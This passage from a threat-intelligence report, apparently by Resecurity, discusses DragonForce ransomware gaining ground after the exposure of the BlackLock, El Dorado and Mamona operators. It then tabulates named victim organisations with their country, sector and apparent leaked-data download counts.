DragonForce ransomware will benefit from the ransomware scene changes as one of the most robust groups, having strong technical capabilities and organization. Nevertheless, the operators behind BlackLock, El Dorado and Mamona Ransomware received a "no place to hide" message: the cybercriminal ecosystem is extremely dynamic and adjusts to force majeure situations. Obviously, the group has suffered significant damage and is unlikely to be able to recover, as their affiliates may be concerned about cooperating with them now due to multiple OPSEC failures.

At the same time, bigger players like DragonForce may extend a helping hand, taking over their market share. Resecurity released a report on the recent activity of DragonForce, specifically regarding their targeting of Saudi Arabia, and will continue to monitor the group. It is expected that the group will accelerate its activities by building alliances with underground affiliates previously working with other ransomware operators.

| Website | Company | Country | Downloads | Vertical |
|---|---|---|---|---|
| reesndtca | Rees NDT Inspection Services | Canada | 5850 | Business Services |
| evasaircom | EVAS Group | Canada | 71824 | Aviation |
| akanthafr | Akantha | France | 388193 | Legal Services |
| hasaargcom | HIDROCARBUROS ARGENTINOS SA | Argentina | 937918 | Industrial |
| datascancom | Inventory Management and Counting Solutions | Texas, United States | 164085 | Technology |
| dgenvirocom | DG Enviro Group | Canada | 132628 | Business Services |
| relateinfotechcom | Relate Infotech | United Kingdom | 14927 | |
| acumengroupus | Acumen Group | California, United States | 85460 | Technology |
| lightspeeddesigncom | Light Speed Design | Washington, United States | 245339 | Business Services |
| kandelaarcom | Kandelaar Electrotechniek | Netherlands | 706048 | Technology |
| fbchighspringsorg | First Baptist Church | Florida, United States | 290792 | Religious Organizations |
| wwwmidlandturbocom | Midland Turbo | United Kingdom | 669088 | Technology |
| wwwlaluckycom | LA LUCKY Brand | California, United States | 120257 | Business Services |
| tiendascarrioncom | Tiendas Carrion Fernandez | Spain | 967603 | Retail |
| bellstaxservicecom | Bells Tax Service | California, United States | 533152 | Business Services |
| pcafterhoursnet | PC AfterHours | Minnesota, United States | 304375 | Technology |
| myrtlebeachcustomhomebuildercom | Nations Homes Commercial Residential Construction | South Carolina, United States | 832767 | Business Services |
| phxcmpcom | The PHOENIX | Puerto Rico | 608588 | Technology |
| barranquitasprgov | The Municipal Administration of Barranquitas and its Department of Finance | Puerto Rico | 515471 | Government |
| keizersca | Keizers Collision CSN Automotive | Canada | 380486 | Business Services |
| compraarubacom | Compra LTD Aruba | Aruba | 346417 | Technology |
| bshsoftcom | Business Systems House FZLLC | United Arab Emirates | 1341397 | Technology |
| gccustommetalcom | GC Custom Metal Fabrications | Canada | 75755 | Industrial |
| datacamposcom | Data Campos Sistemas | Brazil | 31021 | Technology |
| cucinataglianicom | Cucina Tagliani | USA | 370617 | Retail |
| mullenwyliecom | Mullen Wylie LLC | USA | 986992 | Legal Services |
| patricksanderscompanycom | Patrick Sanders and Company PC | USA | 28237 | Business Services |
| cityofpensacolacom | Pensacola | FL, USA | 2106604 | Government |
| a1mobilelockcom | A1 Mobile Lock Key | Washington, USA | 38951 | Business Services |
| adamshomescom | Adams Homes | USA | 433175 | Business Services |
| tankerskahr | TANKERSKA PLOVIDBA dd | Croatia | 342225 | Business Services |
| newriverelectricalcom | New River Electrical Corporation | USA | 665795 | Industrial |
| panzersolutionscom | Panzer Solutions LLC | USA | 508720 | Business Services |
| avioesforzait | avioesforzait | Italy | Visitors 16858 | Business Services |
| celplancom | CelPlan Technologies Inc | USA | Visitors 75710 | Technology |
| allianceindcom | Alliance Industries LLC | USA | 233981 | Business Services |
| autorecyclerscom | A L Auto Recyclers | Canada | 146942 | Business Services |
| burotecbiz | BUROTEC SA | Republique du Congo | 21317 | Business Services |
| kennedyfundingcom | Kennedy Funding | New Jersey, USA | 426319 | Financial Services |
| goughconstructioncom | Gough Construction | Utah, USA | 4554 | Construction |
| htetechcom | HTE Technologies | Missouri, USA | 398790 | Technology |
| lindostarit | LINDOSTAR | Italy | 4938 | Technology |
| premierpackagingcom | Premier Packaging | Tennessee, USA | 16366 | Business Services |
| tbmcgcom | TBM Consulting Group Inc | North Carolina, USA | 211568 | Business Services |
| uccretrievalscom | UCC Retrievals Inc | Virginia, USA | 170597 | Business Services |
| vetkstateedu | K-State College of Veterinary Medicine | KS, USA | 13143 | Education |
| atdamericancom | ATD American | USA | 472567 | Technology |
| fleetequipmentcom | Fleet Equipment Center Inc | IL, USA | 7982 | |
| lasencom | Lasen Inc | 2450 Lakeside Dr Suite B, Las Cruces, NM 88007 | 25125 | Defense |
Copyright 2025 Resecurity Inc. All rights reserved.